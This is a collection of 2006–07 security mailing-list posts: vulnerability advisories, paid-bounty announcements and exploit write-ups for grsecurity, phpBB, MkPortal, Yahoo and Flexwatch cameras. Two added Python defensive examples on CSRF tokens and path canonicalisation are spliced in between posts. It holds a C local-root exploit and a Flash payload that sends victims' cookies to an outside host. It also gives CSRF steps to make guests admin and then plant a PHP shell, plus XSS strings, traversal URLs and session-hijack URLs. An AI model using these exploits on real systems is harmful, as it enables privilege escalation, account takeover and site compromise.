#include <sys/wait.h>

#define KBASE 0xc000
#define SEGMEXEC_TASK_SIZE (KBASE / 2)

#define LOSTPAGE_SIZE (PAGE_SIZE * 3)
#define MAP1_BASE 0x4000
#define MAP2_BASE (MAP1_BASE - LOSTPAGE_SIZE)
#define PF_BASE (MAP1_BASE + SEGMEXEC_TASK_SIZE - 0x4000)

#define PAGE_GROW_NB 10

static char ucode[40] = "\xbe\x00\xF0\xFF\x5F\x83\x3e\x2a";

/* SIGBUS handler: replace the probe code at MAP1_BASE + 600 with NOPs and a ret */
void mouarf(int signum)
{
    char *str = (char *)(MAP1_BASE + 600);

    memset((void *)(MAP1_BASE + 600), 0x90, 40);
    str[26] = 0xc3; /* ret */
    return;
}

int main(void)
{
    int i = 1;
    void (*p)();

    signal(SIGBUS, mouarf);

    if (mmap((void *)MAP1_BASE, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
             MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0) == (void *)-1)
    {
        perror("mmap map1 base\n");
        return 1;
    }

    if (mmap((void *)0x0, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED |
             MAP_ANONYMOUS | MAP_PRIVATE | MAP_GROWSDOWN, 0, 0) == (void *)-1)
    {
        perror("mmap 0x0 failed\n");
        return 1;
    }

    if (mprotect((void *)MAP1_BASE, PAGE_SIZE,
                 PROT_READ | PROT_WRITE | PROT_EXEC) < 0)
    {
        perror("mprotect map1 base");
        fprintf(stderr, "run chpax -m on this executable\n");
        return 1;
    }

    *(int *)(ucode + 1) = (SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
    memcpy((void *)(MAP1_BASE + 600), ucode, 20);
    p = (void *)(MAP1_BASE + 600);
    printf("-- about to fault on %X\n", SEGMEXEC_TASK_SIZE - (PAGE_SIZE * i));
    p();
    printf("Overlapping the kernel by %d pages\n", i);

    fflush(stdout);

    printf("Calling munmap ... %X, %x\n", 0x2000, 0x1000);
    if (munmap((void *)0x2000, 0x1000) < 0)
        perror("munmap");

    // printf("Calling mremap ... \n");
    // if (mremap((void *)0x2000, 0x1000, 0x1, MREMAP_MAYMOVE) == MAP_FAILED)
    //     perror("mremap");

    printf("PID:%d, sleeping\n", getpid());
    sleep(2000);
    return 0;
}


IV. Impact analysis

Successful exploitation allows an attacker to obtain local root privileges. The 
impact is high, since grsecurity should prevent any form of code execution and 
privilege escalation.


V. Legal Notices

Copyright © 2007 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any 

phpBB (privmsg.php) XSS Exploit

2007-01-11 Thread info
phpBB (privmsg.php) XSS Exploit

By: Demential
Web: http://headburn.altervista.org
E-mail: [EMAIL PROTECTED]
PhpBB website: http://phpbb.com

Exploit tested on phpBB 2.0.21

Secunia.com said:

Input passed to the form field Message body in privmsg.php
is not properly sanitised before it is returned to the user
when sending messages to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

The Exploit:

Create a Shockwave Flash file with this code:

var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "</textarea><script>document.location=
'http://site.com/cookie.php?c=' + document.cookie</script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");

Put it into a web page:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here</p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" 
width="0"></iframe>
</body>
</html>

And send it to the admin (or a normal user)
users must be logged-in.

Fixing:

open phpBB2/privmsg.php
find:

if (!($to_userdata = $db->sql_fetchrow($result)))
{
    $error = TRUE;
    $error_msg = $lang['No_such_user'];

replace with:

if (!($to_userdata = $db->sql_fetchrow($result)))
{
    $error = TRUE;
    echo "Sorry, but no such user exists.";
    exit;


Digital Armaments Security Pre-Advisory 11.01.2007: Grsecurity Kernel PaX - Local root vulnerability

2007-01-11 Thread info
Digital Armaments pre-advisory is 01.10.2007
http://www.digitalarmaments.com/pre2007-00018659.html

Digital Armaments releases pre-advisories of vulnerabilities and exploits available 
only to Platinum Subscribers. 
The full advisory might be released to the public after 6 months.

I. Background

grsecurity is an innovative approach to security utilizing a multi-layered 
detection, prevention, and containment model. It is licensed under the GPL.

For further information or detail about the software you can refer to the 
vendor's homepage:

http://www.grsecurity.net/


II. Problem Description

A vulnerability exists in expand_stack() of the grsecurity patch. This vulnerability 
is exploitable only locally.


III. Impact analysis

Successful exploitation allows an attacker to obtain local root privileges. The 
impact is high, since grsecurity should prevent any form of code execution and 
privilege escalation. A working exploit is available.


IV. Credit

Anonymous.

Get paid and get stocks by vulnerability submission
http://www.digitalarmaments.com/contribute.html

V. Legal Notices

Copyright © 2007 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


MKPortal Full Path Disclosure

2007-01-08 Thread info
MkPortal Full Path Disclosure

Vulnerability discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Tested on MKPortal M1.1 RC1 with PhpBB
other versions may also be affected.

http://www.victim.com/mkportal/admin.php?MK_PATH=1

Warning:
main(mkportal/include/mk_mySQL.php):
failed to open stream:
No such file or directory in
D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24


MkPortal Admin XSS

2007-01-05 Thread info
MkPortal Admin XSS

Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new

In both fields write:
<script>alert(document.cookie)</script>
and press save.

The alert will appear here: /mkportal/admin.php?ind=ad_contents
and here: /mkportal/admin.php?ind=ad_contents&op=contents_edit&idc=*
where * is the ID of the page.


MkPortal All Guests are Admin Exploit

2007-01-04 Thread info
MkPortal All Guests are Admin Exploit

Vulnerability discovered and exploited by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", 
"_self", "POST");

Translate "Save+Permissions" into the MKPortal language.
Example: "Salva+questi+permessi" for Italian sites.

Then upload the swf file to a webserver and create an html page like this:

<html>
<head>
<title>Put a title here</title>
</head>
<body>
<p>Put some text here</p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" 
width="0"></iframe>
</body>
</html>

Now send the html page to the MKPortal administrator.
When the admin opens the page, all guests will be able to administer MKPortal.

So you can go here: 
http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php
and paste a php shell or a backdoor.
You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php
where * is the ID of the page.

Translate "page" into the MKPortal language.
Example: "pagina" for Italian sites.


Re: PlatinumFTP 1.0.18 remote DoS

2007-01-01 Thread info
I have spent the last year rewriting the server and it should now be DoS free. I 
have tested against all known vulnerabilities and can't crash the software.  
Please download from www.platinumftp.com and let me know if you find any more.


MkPortal Urlobox Cross Site Request Forgery

2006-12-19 Thread info
MkPortal Urlobox Cross Site Request Forgery

Discovered by: Demential
Web: http://www.burnhead.it
E-mail: [EMAIL PROTECTED]
Mkportal website: http://www.mkportal.it

Posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in the MkPortal urlobox,
where X is the ID of a message:
when the administrator opens the urlobox page,
message X will be erased.
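Added example, not code from phpBB, MkPortal or the posters above: a server-side handler for an MkPortal-style permission save, showing how a per-session CSRF token refuses the Flash-driven POST described in the phpBB privmsg and "All Guests are Admin" posts and the [img]-driven GET of the Urlobox post, while a form served by the site itself passes. The origin, field names and in-memory session store are constructed for the example.

```python
"""CSRF protection for a state-changing admin action (constructed example).

A page on another site can make the victim admin's browser send a request
that carries the admin's session cookie (Flash getURL POST, [img] GET), but
it cannot read the token embedded in the legitimate form, so the token is
what the handler must insist on.
"""
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://forum.example"  # constructed origin for the example


@dataclass
class Session:
    user: str
    is_admin: bool
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str
    cookies: dict
    params: dict
    headers: dict = field(default_factory=dict)


SESSIONS: dict = {}  # session id -> Session; in-memory stand-in for a session store


def login(user: str, is_admin: bool) -> str:
    """Create a session and return its cookie value."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = Session(user, is_admin)
    return sid


def permissions_form(sid: str) -> dict:
    """The legitimate admin form: the hidden fields (idg, p13, as in the post)
    plus the token that only a page served by this site can know."""
    return {"idg": "9", "p13": "1", "csrf_token": SESSIONS[sid].csrf_token}


def save_permissions(req: Request) -> tuple:
    """Handler for the permission save. Returns (status, reason)."""
    session = SESSIONS.get(req.cookies.get("sid", ""))
    if session is None or not session.is_admin:
        return 403, "admin session required"
    # State changes only on POST: a GET triggered by [img]...[/img] never
    # reaches the action, whatever cookies it carries.
    if req.method != "POST":
        return 405, "state change must be POST"
    # Defence in depth: a browser-supplied Origin/Referer from another site
    # is refused. The token check below does not rely on this header.
    src = req.headers.get("Origin") or req.headers.get("Referer", "")
    if src and not src.startswith(SITE_ORIGIN):
        return 403, "cross-origin request refused"
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    # ... apply the permission change here ...
    return 200, "permissions saved"
```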


Digital Armaments Security Advisory 07.12.2006: Yahoo multiple services authentication bypass Vulnerability

2006-12-07 Thread info
Digital Armaments advisory for Platinum Subscription is 06.20.2006
Digital Armaments public advisory is 12.07.2006

http://www.digitalarmaments.com/2006061285940301.html

I. Background

Yahoo! Inc. is an American computer services company with a mission to be the 
most essential global Internet service for consumers and businesses. It 
operates an Internet portal, including the popular Yahoo! Mail. According to Web 
trends Yahoo! is the most visited website on the Internet today with more than 
400 million unique users. The global network of Yahoo! websites received 3.4 
billion page views per day on average as of October 2005.

Various Yahoo! services are vulnerable to an authentication bypass vulnerability.

For further information or detail about the software you can refer to the vendor's 
homepage:

http://www.yahoo.com/


II. Problem Description

Authentication Bypass and Session Binding Vulnerability. A malicious user can 
log on to Yahoo! without submitting the username and password by 
constructing a malicious URL using cookies.

The same session (URL) can be used to log in multiple times from multiple IP 
addresses, leading to a session binding vulnerability.

Example proof-of-concept (sk & d are the session):

--
http://msg.edit.yahoo.com/config/reset_cookies?.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E--.done=http%3a//mail.yahoo.com
--
http://msg.edit.yahoo.com/config/reset_cookies?.y=Y=v=1%26n=0kvgvgv3qlf11
%26l=i42.j4ij/o%26p=m2gvvind13000700.t=T=sk=DAAsN0czPhbeiv%26d=c2wBTlRVMU
FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFnblhtRUJnV0E-.done=http
%3a//mail.yahoo.com
--


III. Detection

This problem has been detected on the online version of the Yahoo! website.


IV. Impact analysis

A malicious user can log on to Yahoo! without submitting the username and 
password by constructing a malicious URL using cookies.


V. Credit

anonymous

Get paid and get stocks by vulnerability submission
http://www.digitalarmaments.com/contribute.html


VI. Legal Notices

Copyright © 2006 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


Digital Armaments November-December Hacking Challenge: KERNEL

2006-11-21 Thread info
Challenge publication is 11.02.2006

http://www.digitalarmaments.com/challenge200611849937.html

I. Details

Digital Armaments officially announces the launch of the November-December hacking 
challenge.

The challenge starts on November 1. For the November-December Challenge, 
Digital Armaments will give 5000 credits EXTRA for each KERNEL vulnerability 
submission that results in a remote code execution vulnerability. It is valid 
for any OS Kernel.

The submission must be sent during the November/December months and be received 
by midnight EST on December 31, 2006. The 5000-credit prize will be given on 
the publication of an official advisory regarding the vulnerability. The 5000 
credits will be an extra added to the normal vulnerability payment (check the 
DACP scheme).

II. References

For further information on the Digital Armaments Contributor Program (DACP) please 
refer to:

http://www.digitalarmaments.com/contribute.html

Details of credits value can be found at:

http://www.digitalarmaments.com/contribute.html#credit

III. Legal Notices

Copyright © 2006 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email customerservice (at) digitalarmaments (dot) com 
for permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information.


Digital Armaments November-December Hacking Challenge: KERNEL Remote

2006-11-17 Thread info
Challenge publication is 11.02.2006

http://www.digitalarmaments.com/challenge200611849937.html


I. Details

Digital Armaments officially announces the launch of the November-December hacking 
challenge.

The challenge starts on November 1. For the November-December Challenge, 
Digital Armaments will give 5000 credits EXTRA for each KERNEL vulnerability 
submission that results in a remote code execution vulnerability. It is valid 
for any OS Kernel.

The submission must be sent during the November/December months and be received 
by midnight EST on December 31, 2006. The 5000-credit prize will be given on 
the publication of an official advisory regarding the vulnerability. The 5000 
credits will be an extra added to the normal vulnerability payment (check the 
DACP scheme).


II. References

For further information on the Digital Armaments Contributor Program (DACP) please 
refer to:

http://www.digitalarmaments.com/contribute.html

Details of credits value can be found at:

http://www.digitalarmaments.com/contribute.html#credit


III. Legal Notices

Copyright © 2006 Digital Armaments Inc.

Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


New version of phplist fixes XSS vulnerability

2006-10-12 Thread info

phplist, http://www.phplist.com is a popular open source newsletter application 
written in PHP.

An XSS vulnerability has been found, in the public pages of the application.
This issue has been addressed in the latest release 2.10.3, available from 
www.phplist.com

Versions affected: any version up to 2.10.2

Credits: MustLive, Administrator of Websecurity web site, 
http://websecurity.com.ua 
discovered the vulnerability and contacted the vendor 

more information at http://websecurity.com.ua/267/

This release also includes the documented fixes for the local file 
include vulnerability http://www.securityfocus.com/bid/17429

Michiel Dethmers


Digital Armaments September-October Hacking Challenge: Explorer and Mozilla

2006-09-27 Thread info
Challenge Publication is 09.15.2006


http://www.digitalarmaments.com/challange200609253923.html


I. Details


Digital Armaments officially announces the launch of the September-October hacking 
challenge.


The challenge starts on September 1. For the September-October Challenge, 
Digital Armaments will give 5000 credits EXTRA for each vulnerability 
submission that results in a code execution vulnerability of Internet Explorer 
or Mozilla Firefox.


The submission must be sent during the September/October months and be received 
by midnight EST on October 31, 2006. The 5000-credit prize will be given on 
the publication of an official advisory regarding the vulnerability. The 5000 
credits will be an extra added to the normal vulnerability payment (check the 
DACP scheme).




II. References


For further information on the Digital Armaments Contributor Program (DACP) please 
refer to:


http://www.digitalarmaments.com/contribute.html


Details of credits value can be found at:


http://www.digitalarmaments.com/contribute.html#credit




III. Legal Notices


Copyright © 2006 Digital Armaments Inc.


Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.


Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


Digital Armaments Security Advisory 24.07.2006: Siemens Speedstream Wireless/Router Denial of Service Vulnerability

2006-07-24 Thread info
Digital Armaments advisory is 05.4.2006

http://www.digitalarmaments.com/2006310665340982.html


I. Background


The SpeedStream Wireless DSL/Cable Router is usually adopted for home and small 
business solutions. Together with an existing DSL or cable modem connection, 
this affordable, easy to use connection sharing solution brings the freedom of 
high-speed, wireless broadband connectivity to home and SOHO networks. Its 
comprehensive functionality provides vital firewall protection, IP sharing 
capabilities, and fundamental routing features that support popular protocols 
like NetMeeting and VPN.

For further information or detail about the software you can refer to the 
vendor's homepage:


http://subscriber.communications.siemens.com/



II. Problem Description


A specially crafted packet sent to the web server that permits administration 
of the router can freeze it.



III. Detection


This problem has been detected on the latest version of the Siemens Speedstream 
Router. It has been tested on the Speedstream 2624.



IV. Impact analysis


Successful exploitation allows an attacker to freeze the router. A reboot is 
necessary.



V. Solution


First notification 05.04.2006.

Second notification 05.24.2006.

No answer from the vendor.



VI. Credit


Jaime Blasco - [EMAIL PROTECTED] is credited with this discovery.


Get paid and get stocks by vulnerability submission

http://www.digitalarmaments.com/contribute.html



VII. Legal Notices


Copyright © 2006 Digital Armaments LLC.


Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.


Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 


Re: imageVue16.1 upload vulnerability

2006-07-19 Thread info
This was fixed in April with the release of imagevue 16.2. You will still be 
able to see the XML relative folder tree, but that is pretty futile as long as there 
is no upload vulnerability.


Re: ATutor 1.5.3 Cross Site Scripting

2006-07-12 Thread info
The XSS issues have been patched and will be available in the coming 
maintenance release (1.5.3_pl1)


The mentioned SQL injection vulnerability is not possible. Please remove it.


Digital Armaments Security Advisory 10.07.2006: Flexwatch Authorization Bypassing and XSS Vulnerability

2006-07-10 Thread info
Digital Armaments advisory is 04.15.2006

http://www.digitalarmaments.com/2006300687985463.html


I. Background


FlexWATCH is a stand-alone network camera server with a built-in CMOS camera and 
web server which delivers crisp real-time live video at a rate of up to 30fps over 
the network. It is normally used as a security camera.

For further information or detail about the software you can refer to the 
vendor's homepage:


http://www.flexwatch.com/



II. Problem Description


Flexwatch Network Cameras are vulnerable to two security flaws, allowing 
cross-site scripting and bypassing of the protected areas. Details:


- Cross-site scripting:


An attacker can cause cross-site scripting:

http://camera/%3Cscript%3Ealert('www.eazel.es')%3C/script%3E


- Authorization Bypassing:


An attacker can bypass the protection of protected pages using /..%2f and 
access the administrative area:

Network Camera V3.0: http://camera/..%2fadmin/aindex.asp

Networks Camera Prior versions: http://camera/app/..%2fadmin/aindex.htm



III. Detection


This problem has been detected on the latest and older versions of Flexwatch Network 
Cameras.

Network Camera Versions tested on:

- ver 3.0 for FW-3400-A(PAL)

- ver 2.0 (PAL)

- ver 2.3 (NTSC)



IV. Impact analysis


Successful exploitation allows an attacker to bypass authorization and access 
the image/video of the security camera. Cross-site attacks are also possible.



V. Solution


First notification 04.16.2006.

Second notification 04.22.2006.

No answer from the vendor.



VI. Credit


Jaime Blasco - [EMAIL PROTECTED] is credited with this discovery.


Get paid and get stocks by vulnerability submission

http://www.digitalarmaments.com/contribute.html


VII. Legal Notices


Copyright © 2006 Digital Armaments LLC.


Redistribution of this alert electronically is allowed. It should not be edited 
in any way. Reprint the whole is allowed, partial reprint is not permitted. For 
any other request please email [EMAIL PROTECTED] for permission.


Disclaimer: The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect, or consequential loss 
or damage arising from use of, or reliance on, this information. 
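Added example, not FlexWATCH firmware or the advisory's code: a toy request pipeline showing why a protected-area check made on the raw request target is defeated by the /..%2f form quoted in the Flexwatch advisory above, and how deciding on the canonical (decoded, normalized) path that the file server will actually resolve closes it, double encoding included. The /admin/ prefix and the request paths are constructed from the advisory's examples.

```python
"""Authorization decided on the canonical request path (constructed example).

If the protected-area check looks at the raw target, "/app/..%2fadmin/aindex.htm"
does not begin with "/admin/" and is let through, yet the file server then
decodes %2f, resolves "..", and serves the admin page. The hardened check
decides on the same canonical path the file server uses.
"""
import posixpath
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/admin/",)  # constructed for the example


def canonicalize(target: str) -> str:
    """Reduce a request target to the path the file server would resolve:
    drop the query string, percent-decode until stable (catches %252f style
    double encoding), collapse repeated leading slashes (posixpath keeps a
    leading '//'), then fold '.' and '..' segments. A leading '..' cannot
    climb above '/'."""
    path = target.split("?", 1)[0]
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    path = "/" + path.lstrip("/")
    return posixpath.normpath(path)


def is_protected_raw(target: str) -> bool:
    """Vulnerable: prefix test on the undecoded, unnormalized target."""
    return target.startswith(PROTECTED_PREFIXES)


def is_protected(target: str) -> bool:
    """Hardened: prefix test on the canonical path. The directory itself
    ('/admin') counts as protected as well."""
    path = canonicalize(target)
    return any(path == p.rstrip("/") or path.startswith(p) for p in PROTECTED_PREFIXES)


def serve(target: str, authenticated: bool, check=is_protected) -> tuple:
    """Toy pipeline: authorization check, then the file server resolves the
    canonical path. Returns (status, path_served); the two disagree when the
    check was made on a different form of the path than the server uses."""
    path = canonicalize(target)
    if check(target) and not authenticated:
        return 401, path
    return 200, path
```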

